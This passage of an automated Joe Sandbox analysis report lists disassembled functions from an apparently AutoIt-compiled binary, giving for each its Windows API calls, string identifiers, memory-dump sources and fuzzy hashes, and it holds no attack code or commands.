                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3869813825-0
                                                                                                                        • Opcode ID: f8cd0ee874ac16c5ea5871b3630179a7df587e60ab278b1ec913411852ff25bd
                                                                                                                        • Instruction ID: c4eb24722b86cd62afad5ae71b6a61f9c09f2868a0b9c87ead9ec6d2181be06f
                                                                                                                        • Opcode Fuzzy Hash: f8cd0ee874ac16c5ea5871b3630179a7df587e60ab278b1ec913411852ff25bd
                                                                                                                        • Instruction Fuzzy Hash: E2516C70900709EFDB20AFA9DD89F6EBBF5FF44708F004929E59AB25A0D774A944CB50
                                                                                                                        Function 00EA01E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcscpy.LIBCMT ref: 00EA026A
                                                                                                                        • _wcschr.LIBCMT ref: 00EA0278
                                                                                                                        • _wcscpy.LIBCMT ref: 00EA028F
                                                                                                                        • _wcscat.LIBCMT ref: 00EA029E
                                                                                                                        • _wcscat.LIBCMT ref: 00EA02BC
                                                                                                                        • _wcscpy.LIBCMT ref: 00EA02DD
                                                                                                                        • __wsplitpath.LIBCMT ref: 00EA03BA
                                                                                                                        • _wcscpy.LIBCMT ref: 00EA03DF
                                                                                                                        • _wcscpy.LIBCMT ref: 00EA03F1
                                                                                                                        • _wcscpy.LIBCMT ref: 00EA0406
                                                                                                                        • _wcscat.LIBCMT ref: 00EA041B
                                                                                                                        • _wcscat.LIBCMT ref: 00EA042D
                                                                                                                        • _wcscat.LIBCMT ref: 00EA0442
                                                                                                                          • Part of subcall function 00E9C890: _wcscmp.LIBCMT ref: 00E9C92A
                                                                                                                          • Part of subcall function 00E9C890: __wsplitpath.LIBCMT ref: 00E9C96F
                                                                                                                          • Part of subcall function 00E9C890: _wcscpy.LIBCMT ref: 00E9C982
                                                                                                                          • Part of subcall function 00E9C890: _wcscat.LIBCMT ref: 00E9C995
                                                                                                                          • Part of subcall function 00E9C890: __wsplitpath.LIBCMT ref: 00E9C9BA
                                                                                                                          • Part of subcall function 00E9C890: _wcscat.LIBCMT ref: 00E9C9D0
                                                                                                                          • Part of subcall function 00E9C890: _wcscat.LIBCMT ref: 00E9C9E3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                        • API String ID: 2955681530-2806939583
                                                                                                                        • Opcode ID: 8e10bf069026b1bf71fd311a20bf9158844cc388066b35246a9d69f1a34bb59a
                                                                                                                        • Instruction ID: ab9e24fdef2a745536b66f10df279a8c4d4040d865a7c719fdf20ff6f8aedd59
                                                                                                                        • Opcode Fuzzy Hash: 8e10bf069026b1bf71fd311a20bf9158844cc388066b35246a9d69f1a34bb59a
                                                                                                                        • Instruction Fuzzy Hash: 9091C471504701AFCB20EB54C955F9FB3E9AF88314F00985DF959AB291EB30FA48CB52
                                                                                                                        Function 00EBCC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00EBCD0B
                                                                                                                        • DestroyWindow.USER32(00000000,?), ref: 00EBCD83
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EBCE04
                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EBCE26
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EBCE35
                                                                                                                        • DestroyWindow.USER32(?), ref: 00EBCE52
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E50000,00000000), ref: 00EBCE85
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EBCEA4
                                                                                                                        • GetDesktopWindow.USER32 ref: 00EBCEB9
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00EBCEC0
                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EBCED2
                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EBCEEA
                                                                                                                          • Part of subcall function 00E6B155: GetWindowLongW.USER32(?,000000EB), ref: 00E6B166
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                        • String ID: 0$tooltips_class32
                                                                                                                        • API String ID: 1297703922-3619404913
                                                                                                                        • Opcode ID: 5d65e27e450e9b676d95b8770e18d94bd29e8e9cdce18d12524d9e58f808c024
                                                                                                                        • Instruction ID: 2b2729458afef08e2cc4eafda4e7456b6c1a5f14d1e4f606c62e04d1302739a8
                                                                                                                        • Opcode Fuzzy Hash: 5d65e27e450e9b676d95b8770e18d94bd29e8e9cdce18d12524d9e58f808c024
                                                                                                                        • Instruction Fuzzy Hash: BF719871258309AFE720CF28DC45FAA3BE5FB88708F14551DFA85A72A1DB70E805DB11
                                                                                                                        Function 00EBF122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00E6AF8E
                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 00EBF14B
                                                                                                                          • Part of subcall function 00EBD5EE: ClientToScreen.USER32(?,?), ref: 00EBD617
                                                                                                                          • Part of subcall function 00EBD5EE: GetWindowRect.USER32(?,?), ref: 00EBD68D
                                                                                                                          • Part of subcall function 00EBD5EE: PtInRect.USER32(?,?,00EBEB2C), ref: 00EBD69D
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00EBF1B4
                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EBF1BF
                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EBF1E2
                                                                                                                        • _wcscat.LIBCMT ref: 00EBF212
                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EBF229
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00EBF242
                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00EBF259
                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00EBF27B
                                                                                                                        • DragFinish.SHELL32(?), ref: 00EBF282
                                                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00EBF36D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                        • API String ID: 169749273-3440237614
                                                                                                                        • Opcode ID: a6ce7fc484338fd5a17e640bc2573487d91fb26f1ee14d91f0ba3139f6aaa4c0
                                                                                                                        • Instruction ID: 011ecedbca84c98d949fc3517aee16a8253fcf26012209c8f1cd16bb3c7b9cab
                                                                                                                        • Opcode Fuzzy Hash: a6ce7fc484338fd5a17e640bc2573487d91fb26f1ee14d91f0ba3139f6aaa4c0
                                                                                                                        • Instruction Fuzzy Hash: F2614972108304AFC710EF64DC85D9BBBE8FF89750F004A1EF695A21A1DB70DA49DB52
                                                                                                                        Function 00E9B428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00E9B46D
                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00E9B476
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00E9B482
                                                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00E9B561
                                                                                                                        • __swprintf.LIBCMT ref: 00E9B591
                                                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00E9B5BD
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00E9B63F
                                                                                                                        • SysFreeString.OLEAUT32(00000016), ref: 00E9B6D1
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00E9B727
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00E9B736
                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00E9B772
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                        • API String ID: 3730832054-3931177956
                                                                                                                        • Opcode ID: 6de74bd8e62e9d72adb18be49fd70f7d6281a3a3e326c92440041900d1613e79
                                                                                                                        • Instruction ID: 33c5509594a4f59bdf303384ee418ee2498106f96cb342139368e414e961bfd2
                                                                                                                        • Opcode Fuzzy Hash: 6de74bd8e62e9d72adb18be49fd70f7d6281a3a3e326c92440041900d1613e79
                                                                                                                        • Instruction Fuzzy Hash: B5C1F231904615DBCF209FA5E984BA9B7F4FF05700F249566E825BB182EB70EC44EBA1
                                                                                                                        Function 00EB6F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00EB6FF9
                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EB7044
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                        • API String ID: 3974292440-4258414348
                                                                                                                        • Opcode ID: 510b7ec79c13c0d36d061503d802c90f72ee092f6fb011a6b2af4fbac69ef080
                                                                                                                        • Instruction ID: 96ba39b05a70a4bc2f9f73f2d71ef40fbc5560bef0c14d8abe1dec004c7280de
                                                                                                                        • Opcode Fuzzy Hash: 510b7ec79c13c0d36d061503d802c90f72ee092f6fb011a6b2af4fbac69ef080
                                                                                                                        • Instruction Fuzzy Hash: AF91A4742487018FCB14EF14D851AAAB7E2AF84354F04685DFC967B7A2CB31ED4ADB41
                                                                                                                        Function 00EBE305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EBE3BB
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00EBBCBF), ref: 00EBE417
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EBE457
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EBE49C
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EBE4D3
                                                                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00EBBCBF), ref: 00EBE4DF
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EBE4EF
                                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,00EBBCBF), ref: 00EBE4FE
                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EBE51B
                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EBE527
                                                                                                                          • Part of subcall function 00E71BC7: __wcsicmp_l.LIBCMT ref: 00E71C50
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                        • API String ID: 1212759294-1154884017
                                                                                                                        • Opcode ID: add512ad9b002a9ca47752bb6079df47a05ef174ec95faa55614643f759b9a5b
                                                                                                                        • Instruction ID: c361d658ec907191e6e82c83553c117b965cfc63e89aaa01618ec6ef8a025707
                                                                                                                        • Opcode Fuzzy Hash: add512ad9b002a9ca47752bb6079df47a05ef174ec95faa55614643f759b9a5b
                                                                                                                        • Instruction Fuzzy Hash: 3D61BC71500214BEEB24DF64DC46BEA7BA8AB08724F109216F925F62D0DB74A984DBA0
                                                                                                                        Function 00EA0E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 00EA0EFF
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EA0F0F
                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EA0F1B
                                                                                                                        • __wsplitpath.LIBCMT ref: 00EA0F79
                                                                                                                        • _wcscat.LIBCMT ref: 00EA0F91
                                                                                                                        • _wcscat.LIBCMT ref: 00EA0FA3
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00EA0FB8
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA0FCC
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA0FFE
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA101F
                                                                                                                        • _wcscpy.LIBCMT ref: 00EA102B
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EA106A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 3566783562-438819550
                                                                                                                        • Opcode ID: ff3c154dcac146917ef708ec37ba8c64caa8c7fd9206a4fb171549cd3524c27b
                                                                                                                        • Instruction ID: 1f07183291b6c33e0695f2b5687474cf7eb7fa5ea7917cc0e3ecfaa0168c2cdc
                                                                                                                        • Opcode Fuzzy Hash: ff3c154dcac146917ef708ec37ba8c64caa8c7fd9206a4fb171549cd3524c27b
                                                                                                                        • Instruction Fuzzy Hash: 6E617FB25083059FCB10EF24C84499AB7E8FF89314F04895EF999E7251EB31F949CB92
                                                                                                                        Function 00E9DAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00E9DB26
                                                                                                                        • GetDriveTypeW.KERNEL32 ref: 00E9DB73
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E9DBBB
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E9DBF2
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E9DC20
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                        • API String ID: 2698844021-4113822522
                                                                                                                        • Opcode ID: 8d0656e19ed0fbfd6cab8d0041ecbe59ec7e24993ea48bd2fe14b515e953c6e1
                                                                                                                        • Instruction ID: c1d03bce9379e92816ecd532570bdcca6e5a4b5aceb438c2e0da7dc1462256f5
                                                                                                                        • Opcode Fuzzy Hash: 8d0656e19ed0fbfd6cab8d0041ecbe59ec7e24993ea48bd2fe14b515e953c6e1
                                                                                                                        • Instruction Fuzzy Hash: BA516B711087059FC704EF20D99186AB7F9FF88758F00986DF896A72A1DB31EE09DB42
                                                                                                                        Function 00E93110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00EC4085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00E93145
                                                                                                                        • LoadStringW.USER32(00000000,?,00EC4085,00000016), ref: 00E9314E
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00EC4085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00E93170
                                                                                                                        • LoadStringW.USER32(00000000,?,00EC4085,00000016), ref: 00E93173
                                                                                                                        • __swprintf.LIBCMT ref: 00E931B3
                                                                                                                        • __swprintf.LIBCMT ref: 00E931C5
                                                                                                                        • _wprintf.LIBCMT ref: 00E9326C
                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E93283
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                        • API String ID: 984253442-2268648507
                                                                                                                        • Opcode ID: b18286f9e1c4609d865eab3e597ba76d25b90eb28e9187d17e3fc0d9e3d69441
                                                                                                                        • Instruction ID: c5ac922fe280e314a04a9a744e3a5f89c1dddf33aa100ac7378e0924cb35a2e5
                                                                                                                        • Opcode Fuzzy Hash: b18286f9e1c4609d865eab3e597ba76d25b90eb28e9187d17e3fc0d9e3d69441
                                                                                                                        • Instruction Fuzzy Hash: 4C418172904208BACF14FBE0DD97EEEB7BDAF14741F105465F605B20A2DE61AF08DA61
                                                                                                                        Function 00E9D950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00E9D96C
                                                                                                                        • __swprintf.LIBCMT ref: 00E9D98E
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E9D9CB
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E9D9F0
                                                                                                                        • _memset.LIBCMT ref: 00E9DA0F
                                                                                                                        • _wcsncpy.LIBCMT ref: 00E9DA4B
                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00E9DA80
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00E9DA8B
                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00E9DA94
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00E9DA9E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                        • API String ID: 2733774712-3457252023
                                                                                                                        • Opcode ID: 36e6b6631e4a0c982bd63b05ff9522ded3348572eeb0a9078d50a1cf4c01f6e6
                                                                                                                        • Instruction ID: b2c654b31c8ea15521f36e3199b4160f8b763ba7acba5e1e4d173cbd97b63651
                                                                                                                        • Opcode Fuzzy Hash: 36e6b6631e4a0c982bd63b05ff9522ded3348572eeb0a9078d50a1cf4c01f6e6
                                                                                                                        • Instruction Fuzzy Hash: 9131A472605218AEDF20DFA5DC49FEA77FCEF84704F1081A6F519E20A0E770DA558BA1
                                                                                                                        Function 00EBE541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
